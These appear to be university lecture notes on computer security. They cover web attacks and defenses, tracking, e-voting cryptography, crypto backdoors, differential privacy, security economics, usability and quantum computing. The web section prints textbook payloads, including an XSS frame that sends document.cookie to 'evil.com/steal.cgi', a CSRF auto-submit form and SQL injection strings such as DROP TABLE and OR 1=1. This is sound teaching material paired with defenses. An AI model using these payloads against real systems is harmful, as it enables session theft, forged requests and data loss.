Some web threat models include passive or active network attackers, and malware
attackers, who control a user’s machine by getting them to download something.

Browser execution model

1. Load content
2. Renders (processes html)
3. Responds to events
• User actions: onClick, onMouseover
• Rendering: onLoad
• Timing: setTimeout(), clearTimeout()

Javascript
There are three ways to include JavaScript in a webpage: inline <script>, in a linked file <script src="something">, or in an event handler attribute <a href="example.com" onmouseover="alert('hi')">
The script runs in a “sandbox” in the front end only.

Same-origin policy
Scripts that originate from the same SERVER, PROTOCOL, and PORT may access
each other/each other’s DOMS with no problem, but they cannot access another site’s
DOM. The exception to this is when you link js with a <script src="" >.
The user is able to grant privileges to signed scripts (UniversalBrowserRead/Write)
Frame and iFrame
A Frame is a rigid division. An iFrame is a floating inline frame. They provide
structure to the page and delegate screen area to content from another source (like
youtube embeds). The browser provides isolation between the frame and everything
else in the DOM.

Cookies

After a request, a server might do set-cookie: value. When the browser revisits
the page, it will GET ... cookie: value and the server responds based on that
cookie.

Cookies hold unique pseudorandom values and the server has a table of values. So,
cookies are often used alongside authentication. BUT it’s only safe to use cookie au-
thentication via HTTPS; otherwise, someone can read the “authenticator cookie”.

CSRF: Cross-Site Request Forgery

The same browser runs a script from a good site and malicious script from a bad site.
Requests to the good site are authenticated by cookies. The malicious script can make
forged requests to the good site with the user’s cookie.
• Netflix: change account settings
• Gmail: steal contacts
• potential for much bigger damage (ie. banking)
How might this happen?
1. User establishes session with victimized server
2. User visits the attack server
3. User receives malicious page
<form action="victimized server page form">
<input> fields </input>
</form>
<script> document.forms[0].submit() </script>
4. attack server sends forged request to victimized server via the user and this form
Login CSRF
Attacker sends request so that victim is logged in as attacker. Everything the victim
does gets recorded on the attacker’s account; or, if the victim is receiving incoming
payments/messages, the attacker will get them.
CSRF Defenses
• Secret validation token <input type="hidden" value="1124lfjq2l3ir" >


You want to bind the sessionID to a particular token. How? (1) a state table at
the server or (2) HMAC of sessionID
• Referer validation (in the header). An attacker script will say that referer is
“attacker.com”
Lenient: referer in header=optional
Strict: referer in header=required

To prevent login CSRF, you want strict referer validation and login forms sub-
mitted over HTTPS. HTTPS sites in general use strict referer validation. Other
sites use ROR or frameworks that implement this stuff for you.
• Custom HTTP header. X-Requested-By: XMLHttpRequest
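A minimal sketch of the HMAC-of-sessionID token from the first bullet, in Python; the server key name is an illustrative assumption.

import hmac, hashlib

SERVER_KEY = b'server-side secret'

def csrf_token(session_id: str) -> str:
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def valid(session_id: str, token: str) -> bool:
    return hmac.compare_digest(csrf_token(session_id), token)

The server embeds csrf_token(sid) in the hidden form field; on submission it recomputes the token from the session cookie and rejects mismatches, so no per-session state table is needed.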

Cross-Site Scripting (XSS)

Example. evil.com sends the victim a frame:

<frame src="naive.com/hello?name=
<script>window.open('evil.com/steal.cgi?cookie=' + document.cookie)</script>
">

Then, naive.com is opened and the script is executed, where the referer looks like
naive.com. The naive.com cookie is sent as a parameter in a request to evil.com, and
steal.cgi is executed with the cookie. 

Other XSS risks


A form of “reflection attack” can change the contents of the affected website by manip-
ulating DOM components. For example, an adversary may change form fields.
Defenses

1. Escape output so that in the above example the page would display

&lt;script&gt; post(evil.com, document.cookie) ...

as text instead of executing a script
2. Sanitize inputs by stripping all tags <>
SQL injection

Example. ’); Drop Tables; --


deletes tables 

Example. SELECT * WHERE user = '' OR pwd LIKE '%'

will select every row and log in with their credentials. 

Example. authenticate if username="valid_user" OR 1=1


1 = 1 is always true, will give you data/allow you to login. can then setup
account for bad guy on DB server itself. 

Example. ... UNION SELECT * FROM credit cards


can pull data from other tables 

Defenses

• Input validation
Filter out apostrophes, semicolons, %, hyphens, underscores. Also check data
type (eg. make sure an integer field actually contains an int)
• Whitelisting
Generally better than blacklisting (like above) because
– you might forget to filter out certain characters
– blacklisting could prevent some valid input (like last name O’Brien)
– allowing only a well-defined set of safe values is simpler
• escape quotes
• use prepared statements
• Bind variables:
? placeholders are guaranteed to be treated as data and not as a control sequence (see the sketch below)
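A minimal sketch of bind variables / prepared statements using Python's sqlite3; the table, columns, and data are illustrative.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, pwd TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'hunter2')")

def login(name: str, pwd: str) -> bool:
    # The ? placeholders are always treated as data, never as SQL syntax,
    # so input like "' OR 1=1 --" cannot change the query structure.
    cur = conn.execute("SELECT 1 FROM users WHERE name = ? AND pwd = ?", (name, pwd))
    return cur.fetchone() is not None

assert login("alice", "hunter2")
assert not login("alice", "' OR 1=1 --")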
13 Web Privacy
Note: see piazza for lecture slides

Third parties

Third parties (ie. not the site you’re visiting), typically invisible, are compiling profiles
of your browsing history. There is an average of 64 tracking mechanisms (visible) on a
top 50 website, and possibly more invisible ones!
Why tracking?
Behavioral targeting: send info to ad networks so that ads are targeted to user interests. (Online advertising is a huge and complicated industry.)
Trackers include cookies, javascript, webbugs (1px gifs), where a third party domain is
getting your information.
The market for lemons
George Akerlof, 1970
”Why do people still visit websites that collect too much data?”
1. buyers/users can’t tell apart good and bad products
2. sellers/service providers lose incentive to provide quality (in the case of the in-
ternet, privacy)
3. the bad crowds out the good since bad products are more profitable

Issues with tracking

• intellectual privacy
• behavioral targeting
• price discrimination
• NSA eavesdropping!

Aliasing
You visit hi5.com, which loads content from its subdomain ad.hi5.com, but DNS maps that name to ad.yieldmanager.com. Your browser treats the tracker as part of hi5.com, so this works even if you block 3rd-party cookies.
Tagging

Placing data in your browser


These include etags, cookies, content cache, browsing history, window.name, HTTP Strict Transport Security (STS), etc. HTTP STS in particular can be exploited to tag your browser.

Definition. A server can set a flag in a user’s browser that says that a certain site
can only be accessed securely, through https 

HTTP STS tagging exploit


A server can set 1 bit per domain in the sense that the “must use https” flag is
either on or off. Now, let’s say that IDs are 32-bit integers. The server can create 32
subdomains and set tracking bits according to the ID by embedding the request to
each subdomain in the page.

Fingerprinting

Observing your browser’s behavior via things like


• user-agent
• HTTP ACCEPT headers
• installed fonts
• cookies enabled y/n?
• screen resolution
If you hash all this information together, you can likely get a unique fingerprint for your browser! (e.g. Panopticlick; a minimal sketch follows)
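A minimal sketch of combining such attributes into a fingerprint; the attribute values are invented for illustration.

import hashlib

attributes = {
    "user_agent": "Mozilla/5.0 (X11; Linux x86_64) ...",
    "accept_headers": "text/html,application/xhtml+xml",
    "fonts": "Arial,Courier,Helvetica,Times",
    "cookies_enabled": "yes",
    "screen": "1920x1080x24",
}
fingerprint = hashlib.sha256(
    "|".join(f"{k}={v}" for k, v in sorted(attributes.items())).encode()
).hexdigest()
print(fingerprint[:16])   # stable identifier as long as the attributes don't change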
Anonymous vs. Pseudonymous vs. Identity
Truly anonymous: you can't even be tracked under a pseudonym across sessions. (How the Internet started)

Pseudonymous: can tell when the same person comes back, but don't know their real-life identity. (Internet post-cookies)

Identity: can get back to the real-life identity.


More ways for websites to get your identity

1. Third party is sometimes a first party: have first party relationship with social
networking sites but they’re also as widgets on other pages
Example: Facebook’s Like button – even if you don’t click it, Facebook knows
you were on that page
2. Leakage of identifiers:
GET http://ad.doubleclick.net/adj/...
Referer: http://submit.SPORTS.com/[email protected]
Cookie: id=35c192bcfe0000b1...

Identity has been compromised now and in the future


3. Third party buys your identity: free iPod scam passing your email to first party
site
Security bugs:
• http://google.com/profiles/me redirects to
http://google.com/profiles/randomwalker

In firefox, can put the url in a script tag, JavaScript throws error which includes
the url, giving randomwalker or other identity just from visiting this random page

Mozilla’s solution: only tell original, not redirected URL


• Google spreadsheets: people don’t necessarily understand can be public

Can specify all in URL in search to get public spreadsheets

Can embed invisible Google spreadsheet and look at “Viewing now” on another
machine– how to tell which of these users to serve what to? Use lots of different
spreadsheets. Assign users to a subset of 10 spreadsheets, and then chance of
overlap pretty low.

Google fixed by showing user as Anonymous when on a public spreadsheet even


when logged in, revealing identity only if explicitly shared with that user (and
the user accepted).
How security bugs contribute to online tracking

This entire section from 2012


• History sniffing and privacy:
CSS :visited property; how can the web page figure out the color? Check in
JavaScript
– getComputedStyle()
– cache timing: on page, try to download something as embedded; if visited
before, faster due to caching
– server hit: based on if browser downloads image or not
• Identity sniffing:
– All social networking sites have groups that users can join
– Users typically join multiple groups, some of which are public
– Group affiliations act as fingerprint
– Predictable group-specific URLs exist
Look through members of groups and see who matches in all the groups the user has joined
Fix as browser: ensure that a site can’t see what color a link is by keeping track
of who (browser’s rendering component vs programmatic component) is making
the query
Fix as social network: make the URLs not predictable
• One-click fraud: Display IP address and approximate location, so user assumes
the site knows who you are
What if the website actually has your identity and makes a credible threat?
• Not a bug:
Facebook’s instant personalization: Facebook tells partner sites who you are

Defenses

1. Referer blocking
Drawback: many sites check referer headers as a CSRF defense, so blocking all referer headers will break websites.
2. Third-party cookie blocking


Relatively little breakage, but doesn’t prevent fingerprinting.
Safari’s cookie blocking policy: It blocks third party cookies unless user is submit-
ting a form, or browser already has cookie from the same party (eg. a facebook
“like” button still works).
Google ad network tried getting around this by using invisible forms
3. “Do not track” option in browsers
4. HTTP request blocking
Compile and maintain a list of known trackers based on domain names and
regexes. The user installs a browser extension (like adblock plus), which down-
loads the above list and blocks requests to objects on the list.
Drawbacks: False positives/negatives; need to trust the list.
14 Electronic voting
Requirements
• only authorized voters can vote
• ≤ 1 ballot per voter
• ballots counted as cast
• secret ballot; ”receipt-free” (cannot prove to 3rd party how you voted)
Logically, this involves two steps: (1) cast ballot into ballot box and (2) tally ballot
box to get result.
Old-fashioned paper ballots are cheap to operate and easy to understand, but problematic if the ballot is long/complex. Trickery is still possible: for example, in chain voting, "goons" fill out a ballot and coerce voters to deposit that ballot into the box and return the blank one to them, and the process repeats. There also needs to be a chain of custody on the ballot box.

End-to-End (E2E) crypto voting

Example. Benaloh

1. voter encrypts ballot, casts ciphertext ballot


2. system publishes the ciphertext (CT) ballot on a public bulletin board
3. at the end of the election, tally the votes.
(1) shuffle and reencrypt CT ballots
CT ballots can’t be matched to originals; trustees collectively decrypt CT ballots
(2) reencrypted CT ballots public, anyone can do tally


The tricky part is reencryption.

Definition. Randomized encryption: One plaintext can go to many possible cipher


texts 

Definition. Reencryption means that given ciphertext C, compute reenc(C) [randomized] such that
decrypt(reenc(C)) = decrypt(C)
Additionally, (C, reenc(C)) needs to be indistinguishable from (C, reenc(C’)). Essen-


tially, so you can’t figure out which reencryption goes with which of the inputs. 

El Gamal encryption method

• Public parameters g, p (like Diffie-Hellman)
• Private key: x
• Public key: g^x mod p
• to encrypt message m:
– pick a random value r
– compute (g^r mod p, m·g^(rx) mod p)
– to decrypt with the private key: given (A, B), compute A^(−x)·B mod p

Reencryption in El Gamal

• Given (A, B), generate random r′
• Compute
(A·g^(r′) mod p, B·g^(r′x) mod p) = (g^r·g^(r′) mod p, m·g^(rx)·g^(r′x) mod p) = (g^(r+r′) mod p, m·g^((r+r′)x) mod p)
• This is a valid encryption of m under randomness r + r′, so the private key still decrypts it. Also, the two ciphertexts are indistinguishable! (A minimal sketch follows.)
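A minimal sketch of El Gamal encryption, reencryption, and decryption in Python, using toy insecure parameters (p = 23, g = 5); a real system would use a large prime-order group or elliptic curves.

import secrets

p, g = 23, 5                          # public parameters (toy values)
x = secrets.randbelow(p - 1) or 1     # private key
h = pow(g, x, p)                      # public key g^x mod p

def encrypt(m: int) -> tuple[int, int]:
    r = secrets.randbelow(p - 1) or 1
    return (pow(g, r, p), (m * pow(h, r, p)) % p)

def reencrypt(ct: tuple[int, int]) -> tuple[int, int]:
    A, B = ct
    r2 = secrets.randbelow(p - 1) or 1
    # multiply in a fresh encryption of 1: the randomness becomes r + r2
    return ((A * pow(g, r2, p)) % p, (B * pow(h, r2, p)) % p)

def decrypt(ct: tuple[int, int]) -> int:
    A, B = ct
    return (pow(A, p - 1 - x, p) * B) % p    # A^(-x) · B mod p

m = 7
ct = encrypt(m)
assert decrypt(ct) == m
assert decrypt(reencrypt(ct)) == m    # same plaintext, fresh-looking ciphertext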
How do we know shuffler didn’t cheat?
They start with a "ballot box" B (a sequence of encrypted ballots) and end with B′, which should be equivalent (a reordering of reencryptions of B)

Proof protocol
• prover produces B1
• B1 should be equivalent to B and B′
• prover (shuffler) knows the correspondence between B and B1, and also between B1 and B′
Note: if B is not equivalent to B′, then B1 can't be equivalent to both
• challenger flips a coin, asks prover to show the equivalence between B and B1, or between B′ and B1
• prover "unwraps" the equivalence
"Look, we can get from B′ to B1 by reencrypting with these random values and then reordering like this"
BUT remember that the prover can't show the equivalence between all three, because then the challenger would know a path from B to B′, and you don't want that.
Play this proof game k times. If the prover is lying (B not equivalent to B′), he will get away with it with probability 2^(−k).
This whole complicated game is designed to convince us that B and B’ are in fact
equivalent without telling us what the exact mapping is between B and B’
This seems like a problem, since there exists someone who knows the correspondence between voters and ballots. BUT we can use multiple shuffling steps so that we only need one honest shuffler to maintain the secret ballot.
Upshot: can know 1-1 correspondence between voters and published plaintext ballots,
but not what the correspondence is
A lurking attack: What if the voter remembers the random r used to encrypt their ballot? The voter can prove how they voted by revealing r.

enc ballot = (g^r mod p, m·g^(rx) mod p)

Fix? Introduce a trusted voting machine that the voter cannot manipulate; it encrypts
ballot and refuses to reveal r. But yet another problem: how do you know voting
machine protects integrity and confidentiality of ballot?

In summary

PAPER: counting is slow and expensive; the voter sees the record directly; main threat is tampering afterwards.
ELECTRONIC: counting is fast and cheap; the voter does not see the record directly; main threat is tampering beforehand.
PAPER + ELECTRONIC RECORDS: method of choice
Example: optical scan voting. The voter fills out a paper ballot and feeds it into a scanner; the scanner records an electronic record, and the paper ballot drops into the ballot box.
HYBRID COUNT
• count electronic records
• statistical audit for consistency of the paper records with the electronic records
• for sample of ballots, compare by hand
15 Backdoors in crypto standards


Note: see piazza for lecture slides
The USA used Navajo as a code during WWII
• enemies couldn't get an accurate phonetic rendering of the code
• it provided authentication because outsiders can't replicate the tonal language easily

Obvious weaknesses vs. back doors


OBVIOUS WEAKNESS
• everyone knows it and can see it
• eg. reducing the key size to make brute force attacks easier

BACK DOOR
• presence is not obvious
• keyed backdoors vs. unkeyed backdoors
KEYED BACKDOORS: need a secret master key to access back door
UNKEYED BACKDOORS: not obvious, but just hoping that nobody notices; like a hidden door in real life

Data Encryption Standard (DES)

(1) introducing a stronger encryption standard would make US communications more


secure (2) but would also allow enemies to find/use this stronger encryption
Three organizations worked on DES: IBM, NIST, and NSA. DES is a Feistel-like procedure:
• S-boxes with fixed constants (differential cryptanalysis had been discovered, and the S-boxes were chosen to resist it, but they didn't want people to know about differential cryptanalysis)
• key length = 56 (NSA wanted to use 48, IBM wanted to use 64, they compromised
at 56)
• a number of iterations
People were concerned about a builtin backdoor. In reality, NSA tried to weaken the
algorithm (smaller key size) but installed no backdoor.
DUAL-EC

Definition. Relies on elliptic curves (EC)


Points are solutions to equations of the form

y^2 mod p = (x^3 + ax + b) mod p

You “add” two EC points to get another EC point. Multiplying point by an int is the
same as adding it to itself repeatedly. 

How it works
• Pick random, non-secret EC points P, Q
• start with a secret integer s_0
• to update and generate new output:
s_i = x(s_{i−1}·P), where x(·) extracts the x coordinate
output T(x(s_i·Q)), where T(·) truncates, discarding the 16 high-order bits
Problem 1
Adversary can create keyed backdoor if they can choose P and Q (see slides)
So then naturally the NSA chose P and Q.
How to generate P and Q?
• choose random seed
• use a one-way algorithm
• get P and Q
But what if adversary chooses the seed?
It should be okay as long as one-way algorithm is good, and the adversary can’t
understand the relationship between P and Q

Problem 2 Output bits are easily distinguished from random. NSA argued against
fixing this (a vulnerability)
(It’s overwhelmingly likely that NSA created a keyed backdoor into this standard by
choosing P and Q)
What happened: SSL/TLS connections whose randomness comes from Dual-EC are exploitable in practice. NIST's error? Not insisting on fixing the vulnerabilities, resulting in a loss of trust in NIST.
The end-user was more vulnerable to NSA due to keyed backdoor and more vulnerable
to others due to the bias (unkeyed backdoor)
Net effect: semi-keyed backdoor
Digital Signature standard (DSS)

There are a lot of known insecure curves, and some curves that are probably secure,
but no one can prove it. Let’s also say that some adversary can break a fraction f of
the believed-good curves.

How do we choose a curve when the standard writer might be an adversary?


• standard writer chooses a curve (never secure)
• choose randomly (secure with Pr = 1 − f )
• one-way algorithm with adversary choice; secure with Pr = (1 − f)^k

Backdoor-proof standardization

• Transparency
discussions on the record, rationale for decisions published
• Discretion is a problem! It gives adversary latitude.
eg. choice of technical approach, choice of mathematical structure, choice of
constants
• Use competitions, because negotiations in a standards committee is risky.
participants submit completely proposals. One is chosen by a group and the
chosen proposal is adopted as-is or with absolutely clear improvements (this is
how AES was gotten)
Shared trust standards benefit everyone :)
20 Big data and privacy


When you have a big database with data about people, you want to make valid inferences about the population as a whole, but not valid inferences about individuals.
Approaches
• release summary stats
good privacy if done right, though it withholds potentially useful information
• anonymize the data set before release
This is much harder to do right than it sounds because of two problems:
– quasi-identifiers: unique but ”not identifying”, e.g. birthday + zip code +
searches for their own name
– linkage to outside data, e.g. looking at netflix data and looking at IMDB
data to re-identify people
In analyzing big data, we want semantic privacy.

Definition. Given two databases D and D′, where D′ is D with your data removed, anything an analyst can learn from D, they can also learn from D′ 
Theorem 20.1. Semantic privacy implies that the result of the analysis does not de-
pend on the contents of the dataset.

Definition. A randomized function Q gives ε-differential privacy (ε-DP) if for all datasets D1, D2 that differ in the inclusion/exclusion of one element, and for all sets S, the following is true:

Pr[Q(D1) ∈ S] ≤ e^ε · Pr[Q(D2) ∈ S]

As ε goes to 0, we get stricter about privacy. 

Useful fact: Post processing is safe.

If Q(·) is ε-DP, then for all functions g, g(Q(·)) is ε-DP.


How to achieve ε-DP?

Ans: Add random noise to “true answer”

Example. Counting queries: ‘‘How many items in the DB have the property _____?’’

• Let C = correct answer


• Generate noise from the distribution with probability density function (PDF) f(x) = (ε/2)·e^(−ε|x|)
• Return C + noise
We can prove this approach is ε-DP; ε controls the accuracy/privacy tradeoff (as accuracy increases, privacy decreases). 

To make results “non weird” (1) round off numbers to integers, (2) if a result is less
than 0, set it to 0, and (3) if a result is greater than a cap N , set it to N .
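A minimal sketch of the noisy counting query in Python, with the rounding and clamping just described; the database, predicate, and ε are illustrative. It uses the fact that the difference of two exponential samples with rate ε is Laplace-distributed with scale 1/ε.

import random

def dp_count(db, predicate, epsilon: float, cap: int) -> int:
    true_count = sum(1 for row in db if predicate(row))
    noise = random.expovariate(epsilon) - random.expovariate(epsilon)   # Laplace(1/ε)
    answer = round(true_count + noise)
    return max(0, min(cap, answer))    # clamp to [0, cap] so results aren't "weird"

db = [{"age": a} for a in (17, 22, 35, 41, 19, 63)]
print(dp_count(db, lambda r: r["age"] >= 21, epsilon=0.5, cap=len(db)))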
What about multiple queries and averaging?
Theorem 20.2. If Q is ε1-DP and Q′ is ε2-DP, then (Q(·), Q′(·)) is (ε1 + ε2)-DP.
(Essentially, you've added up how non-private the queries are)
The implication? You can give an analyst an "ε budget" and let them decide how to use it.
Generalizing beyond counting queries
If each element of the database can add/subtract at most some number V from the
results of the query, then we can generate noise from this distribution:

f(x) = (ε/2V)·e^(−ε|x|/V)

and the result will be ε-DP.

Problems

Collaborative recommendation systems:


“People who bought X also bought Y”
“If you like this you’ll also like that”

Example. Artificial example: But what if there exists a book that only Ed would
buy?
“People who bought said book also bought Y”
Now you can easily extract information about what else Ed buys. 
Example. Less artificial example: But what if there exists a rare book that you know
Ed bought?
“People who bought said book also bought Y”
Collaborative recommendations are still a clue about what Ed bought. 

How to fix

Look at internals. Let’s say a system computes a covariance matrix (basically a


correlation between all pairs of items) to generate these recommendations. The matrix
could be computed in a DP fashion, adding noise.
Other useful tricks
Machine learning + DP queries: A machine learning algorithm exchanges a bunch of
DP queries and results, and it’ll synthesize a new data set.
21 Economics of Security
Does the market produce optimal security? To understand this question, we'll first want to define what "optimal" means.

Definitions of Efficiency

Definition 1: Strong Pareto Efficiency


• Condition A is Strong-Pareto-Superior to Condition B if everyone likes A better
than B
• ”Available alternative” =⇒ one that is reasonably feasible
• A condition is SP-efficient if: no SP-superior alternative is available
Definition 2: Kaldor-Hicks efficiency
• Condition A is KH-superior to Condition B if there exist zero-sum payments
among people such that A + P is SP-superior to B
• payments need not happen, just a theoretical construct
• A condition is KH-efficient if: no KH-superior alternative is available
Using these definitions, consider a world with perfect information and perfect bargain-
ing. Theorem: Outcomes in this world will be both SP-efficient and KH-efficient.
Proof:
• SP-Efficient: By contradiction. Assume the outcome is not SP-Efficient. Then
an alternative exists that is SP-superior to the existing outcome. However, bar-
gaining would lead to the adoption of this superior outcome.
• KH-Efficient: By contradiction. Assume the outcome is not KH-Efficient. Then
there is an alternative A and a set of payments P such that A + P is SP-superior
to the existing outcome. Then the outcome isn’t SP-Efficient (as proved above).
Therefore, if we observed market failures, they must result from a breakdown in either
perfect information or perfect bargaining.

Market Failures

Market failure #1: Negative Externalities


• If my machine is compromised, some harm falls on me, and some harm falls
on strangers (e.g. from denial of service attacks or spam launched from my
computer)
• In general, users will invest in reducing harm to themselves, but not to strangers
• Outcome is underinvestment in security, since the external harm doesn’t enter
into user’s cost/benefit calculation
• Breakdown in perfect bargaining, since the ”strangers” are unidentified and un-
able to invest to prevent the harm that falls on them
Market failure #2: Asymmetric Information
• Arises when vendors know more than users about the security of their products
• If it is hard for buyers to evaluate the security of products, then they won’t be
able to differentiate between high-quality and low-quality products
• As a result, users won’t pay more for supposedly high-quality products, so pro-
ducers won’t invest to develop more secure products, leading to underinvestment
in security
• Antidotes:
– Warranties: act as a signal of quality to buyers if companies willing to bear
the downside of security breaches
– Seller reputation: companies may be harmed in the long-run by selling poor
quality products due to damaged reputation
– Note: both of these solutions don't work well for start-ups, since the lifetime of these companies is short, so warranties aren't very valuable and seller reputation isn't a large concern
Network Effect:
• Some products tend to become more valuable the more people use it (e.g. search
engines)
• Markets for these products tend to be pushed towards monopoly
• Standardization can lead to positive network effect without monopoly
• Argument: network effect → monoculture
• Example: if all products use the same security protocol, it might be easier for bad guys to break lots of systems by exploiting a vulnerability in that standard
• However, there are benefits to having a dominant producer of security:
– There are scale efficiencies in security, since large companies can amortize
investments over a large number of users
– Companies can also internalize some of the security benefits, if users harmed
(as in the Negative Externality scenario) fall within the same user base
– Antidotes to asymmetric information are more effective (reputation is more


important to large companies than start-ups)
Race to market:
• Because of the network effect, companies have a strong incentive to gobble up
market share as fast as possible
• Often, minimum viable products tend not to require large investment in security
• Start-ups face decision to invest $1 in security today and receive a pay-off of $N
in the future
• Lead to a ”bolt on security” approach, where security features are added once
product is already being used

Solutions to Market Failures

Large customers tend to be able to protect themselves; for example, they can demand
that certain security features be implemented in a product. But what about individual
users?

Can market structures improve information flow? Insurance companies (i.e. that
offer insurance against security breaches) can aggregate the bargaining power of many
different customers. Certification programs, which would give products/companies cer-
tificates of quality, could lead to the same effect. Presumably, certified companies
would see more demand and be able to charge higher prices for their products. How-
ever, companies are unlikely to pay certification bodies to criticize their software.

Can we change liability rules? An optimal liability rule: costs should be borne by
whoever can best prevent harm.

Case study: ATM Fraud


• In the early days of ATMs, many people would withdraw money and claim they
didn’t to force banks to re-credit their account
• In the US, if there wasn’t conclusive proof, banks bore the cost
• In the UK, if there wasn’t conclusive proof, customers bore the cost
• level of fraud significantly lower in US, since banks had made investments to
gather evidence of withdrawal in order to avoid losses
• Generalizing, this seems like an argument in favor of shifting liability for security
flaws to producers, since they are generally in a better position to identify and
fix errors in software and hardware
Some problems with shifting liability:


• It’s hard to attribute blame: e.g. identifying the true source of a denial of service
attack launched from a network of computers in many geographic locations
• It’s hard to measure harm: difficult to isolate the harm caused by a single security
breach
• There’s a substantial cost to adjudication
22 Human Factors in Security


We often attribute security failures to ”user error.” But why do users make so many
errors? There are several sources:
• Bad UI / Poor User Experience (UX)
• Rational ignorance: sometimes, investing the effort to learn how to use security
software or a protocol outweighs the benefit
• Heuristic decision making
• Cognitive biases
Relying on a "smart user" has hidden costs. An example is relying on users to detect "spear-phishing" emails and to distinguish malicious attachments from genuine ones.
The user might then have to contact colleagues to verify legitimate emails, costing
both parties time. Some emails falsely thought to be malicious might never be opened.

A common mistake when designing security software is to ”design for yourself.” There
are many different kinds of users, and their needs will probably vary over time, so
designing software for the use of a knowledgeable developer is probably a misguided
approach.

Example: Wifi Encryption

• Everybody recommends encrypting WiFi networks, but a relatively small number


of networks are actually encrypted (e.g. powerless)
• Problem: key distribution
– Key must be known to all devices on the network
– Difficult to make the network open to outsiders
– Even if we allow everyone onto the network, it seems silly not to encrypt
traffic once people are actually connected to the network
• Why don’t people encrypt?
– Bad out-of-box experience (people can’t access internet immediately)
– Some internet-enabled devices don’t have I/O (e.g. thermostat, coffee-
maker)
– The devices need to remember the key over time
– A secret key known to 15,000 people isn’t really a secret
• How can we fix this?


– Exploit physical proximity (e.g. ”tap to pair device”)
– Physical transfer of key through dongle
– Adopt a ”Trust On First Use” (TOFU) policy, which assumes no imperson-
ation the first time a machine connects
– Warning-based approach: warn administrator when a new party connects
to the network

Case study: Email encryption (”Why Johnny Can’t Encrypt”)

Some researchers presented ”average users” with a PGP mail client, and asked them
to perform tasks that required encryption (e.g. send a secure email to Alice, set up a
new secure communication with Charlie). The goals were to observe a) how they use
it and b) what mistakes they make.

The study revealed that average users experienced LOTS of usability problems and
made LOTS of security errors. Why?
• UI design mistakes (e.g. hard to find something in a dropdown menu)
• Metaphor mismatch
– e.g. RSA key was visualized with a physical key icon
– but a cryptographic key isn’t much like a physical key
– why would a user want to publish their key? (as they do with the public
key) why are there two keys (public and private)?
– one suggestion: ”ciphertext is a locked chest” (not a perfect analogy)
• User has to do lots of work up front, before communicating at all
– have to first generate a key pair
– this is the point in the process where users understand the least, and are
most eager to send a message
This case study raises the question about what role the user should play in a secure
procedure. Should they
• control a mechanism? (e.g. ”block cookies” on a browser)
• use a tool? (e.g. ”clear history” on a browser, which performs many tasks like
clearing cache)
• state a goal?
The goal for many systems is a ”naturally secure interface.” One example here is the
camera light on a laptop that is intended to light up whenever camera is in use.
• user obtains protection against being secretly recorded
• however, on Macs, this light can be bypassed by re-programming firmware that
links camera and light
• a better solution would be to build in a hardware interlock between camera and
light

Social Barriers to Adoption

Case study: an organization that recruits volunteers to break the law in order to put
political pressure on issues. Organizations like this have a strong incentive to encrypt,
since their threat model includes an adversary (government) with a large amount of
resources.

Why don’t people encrypt more often?


• Stigma attached to use of encryption
– only ”paranoid” people use encryption
• Etiquette of encryption
– reply should be encrypted if and only if original message was encrypted
– seen as impolite to respond to an unencrypted message with an encrypted
message, particularly if replying to a superior
• Encryption is seen as a barrier to recruitment
– the up-front cost of setting up a dedicated email client might discourage
volunteers from participating

Warning messages

Warning messages are often used to preempt security breaches. However, users can
suffer from ”dialogue fatigue” and either click through important warnings or find
workarounds.

Countermeasures:
• Vary design of dialogue
• Make "No" the default (so the user can't just hit enter to click through)
• Delay activation of ”OK” button


• ”Hey, you really need to read this” approach
Lately, designers often choose secure defaults and don’t ask the user for an up-front
choice.

NEAT/SPRUCE Framework

A set of questions created by Microsoft to guide developers:

NEAT: Is your security/privacy UX:


• Necessary? Can you eliminate it or defer user decision?
• Explained? Do you present all info user needs to make decision? Is it SPRUCE?
• Actionable? Is there a set of steps user can follow to make correct decision?
• Tested? Is it NEAT for all scenarios, both benign and malicious?
SPRUCE: When presenting a choice to the user, consider
• Source: say who is asking for decision (which application / component / machine)
• Process: give user actionable steps to a good decision
• Risk: explain what bad thing could happen if user makes a wrong decision
• Unique knowledge: tell user what info they bring to the decision
• Choices: list available options, clearly recommend one
• Evidence: highlight info user should include/exclude in making the decision
23 Quantum Computing

Classical Bits

• Two states, written as |0 > and |1 > (classical 0 and classical 1)


• Can read bit to recover state
• Two single bit logic gates: identity and invert

Quantum Bits (qubits)

By analogy with classical bits:


• State is a linear combination of classical states: x|0 > + y|1 >, such that |x|^2 + |y|^2 = 1
• x and y are complex numbers (giving the linear combination 4 degrees of freedom)
• If x and y are restricted to real values, then the possible states are represented by the unit circle
• Special measurement operation:
– Only way to read a qubit's state
– Sets the bit to |0 > with probability |x|^2 and |1 > with probability |y|^2, and returns the result
– "destroys" information by reducing the qubit to a classical state
• operations on a qubit = any operation that preserves the condition that |x|^2 + |y|^2 = 1
• writing a qubit as the column vector (x, y)^T, a valid operation on a qubit is any unitary matrix M, since M·(x, y)^T = (x′, y′)^T with |x′|^2 + |y′|^2 = 1
• example: R = (1/√2)·[[1, −1], [1, 1]] "rotates" the qubit counterclockwise by 45° on the unit circle
Tempting (but wrong) view:


It's tempting to think of a qubit as a classical bit whose state is "unknown" (i.e. is |0 > with probability |x|^2 and |1 > with probability |y|^2). The R operator above would then be thought of as a "randomizing" operator. However, applying R(R(|0 >)) gives |1 > with certainty. This isn't consistent with the view that R(|0 >) is a "random" bit, since applying a randomizing operator to randomness shouldn't lead to a certain outcome.

Multi-qubit systems:

• In a classical system with k bits, the possible states of the system are |(every k-bit string) >, of which there are 2^k
• In a quantum system, the possible states are Σ_{i=0}^{2^k − 1} α_i·|s_i >, where s_i is the i-th k-bit string, such that Σ_{i=0}^{2^k − 1} |α_i|^2 = 1

• Measuring the system forces it into classical state |s_i > with probability |α_i|^2
• In principle, operations on the multi-qubit system include any unitary matrix
• In practice, we use a few simple gates
• Computation:
– initial state = |(input)00000 > (input is padded with zeros to some fixed
length)
– perform some preprogrammed set of gates
– measure system to produce output
– goal is for the system to collapse to the ”correct” answer with high proba-
bility upon measurement
Can we built a quantum computer? Right now, we can only build small ones, but there
is reason to believe we will be able to construct larger ones in the future.

Advantages of QC

There is a common but wrong view that quantum computers will be able to solve any
problem in NP efficiently (i.e. in polynomial time). The idea here is that you can put
a quantum computer into a state which is a superposition of all the possible solutions,
and then measure to determine the ”correct” answer. In reality, decreasing the coef-
ficients on incorrect answers and increasing the coefficient on correct answer(s) isn’t
always easy.

What we know:
• for general NP hard problems, classical computers require brute force search
(takes O(2^n) time)
